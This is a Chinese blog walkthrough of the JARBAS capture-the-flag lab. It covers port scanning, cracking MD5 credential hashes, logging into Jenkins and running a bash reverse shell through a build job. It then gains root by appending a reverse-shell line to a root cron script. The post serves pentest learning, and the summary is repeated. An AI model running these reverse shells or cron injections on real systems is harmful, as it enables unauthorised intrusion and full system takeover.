JARBAS - Jenkins渗透原理详解

qrcode_for_gh_e5fc05804a3e_430

nmap端口扫描

主机发现

image-20240530200757038

创建文件夹进行保存扫描记录

指定最低1万速率扫描所有端口

image-20240530201203565

提取端口

image-20240530203609257

详细扫描

image-20240530203720238

脚本扫描

image-20240530204205753

web渗透

image-20240530205352254

脚本扫描里有robots;去看一下

image-20240530205439598

# we don't want robots to click "build" links
User-agent: *
Disallow: /

先目录爆破80端口

没有信息

image-20240530205838528

另一个扫描工具

也没有任何发现

image-20240530205951450

点击网站;看有没有啥提示

我们再指定一下扩展名

image-20240530210326309

可以看到access.html

老黑兄弟来帮忙提示了

以安全的方式加密的信用证!

image-20240530210420062

tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

如果不知道编码方式可以使用hash-identifier来识别一下

就是md5

image-20240530210639921

解码

tiago:italia99
trindade:marianna
eder:vipsu

使用第三个账户密码登录成功

image-20240530211423133

我们应该是获得了更高的一个访问权限

Jenkins是一套著名内容管理系统;持续集成工具

了解不了解关系不大;但是我们需要懂得bug利用方式

简单点击查看管理系统功能

image-20240530232547453

获得初级系统权限

创建一个任务;填写名称;确定

第一个执行windows p 处理命令;因为扫描过程中,我们知道这个不是windows

第二个执行shell ;我们就用它

image-20240530232919589

这样我们写shell脚本

/bin/bash -i >& /dev/tcp/192.168.218.145/4444 0>&1

就需要我们在kali中开启监听4444端口

保存;理论上来说我们构建的反弹shell,点击立即构建就能够让kali收到一个反弹shell

image-20240530233621129

好,看kali中已经返回shell;同时上图也显示正在执行的任务

image-20240530233717584

crontab系统提权

正常查看下版本;用户;组;sudo -l权限; sudo提权没戏,那就看passwd

image-20240530234009762

查看下有哪些用户;目前我们的用户bash环境不太稳定,shadow无权查看

eder;root

我们就在其他提权路线做些尝试

image-20240530234139575

先看一下系统有没有自动任务吧

一般是/etc/crontab;最下面有一条记录,应该是每五分钟以root权限执行

/etc/script/CleaningScript.sh把他扔掉

少数也有cron.d

image-20240530234820505

内容很简单,貌似是删除返回日志;反正这个文件是由root权限

image-20240530235236759

将payload加入到root权限的文件夹里;先在kali中开启监听,因为我们不知道5分钟目前到哪了

echo “/bin/bash -i >& /dev/tcp/192.168.218.145/4443 0>&1” >> /etc/script/CleaningScript.sh

#因为我们看到root那边后缀有bash环境的,将payload追加到/etc/script/CleaningScript.sh

现在等待五分钟看能不能成功吧

image-20240531000558960

总结

打靶正常的思路,先nmap扫,tcp、udp全扫一遍,防止漏掉信息

80优先思路、22ssh爆破放最后

普通扫目录无信息、根据网站信息猜测、再指定扫描测试

对编码进行hash-id识别、解码、利用信息尝试登录

要么是ssh登录、要么是8080的登录;进行尝试

进入网站登录后利用jenkins常用的漏洞、写linux执行的bash环境payload进行反弹shell

权限比较低;无权查看shadow;sudo也没思路;查看自启任务有root权限

写入poc;5分钟自动进入了root权限

这个靶机就被完全结束了

实战与靶场是不同的,靶场只是学习思路,有时写入我们还需要ls -laih查看有无写入权限等

进入网站登录后利用jenkins常用的漏洞、写linux执行的bash环境payload进行反弹shell

权限比较低;无权查看shadow;sudo也没思路;查看自启任务有root权限

写入poc;5分钟自动进入了root权限

这个靶机就被完全结束了

实战与靶场是不同的,靶场只是学习思路,有时写入我们还需要ls -laih查看有无写入权限等

  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lu-fe1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值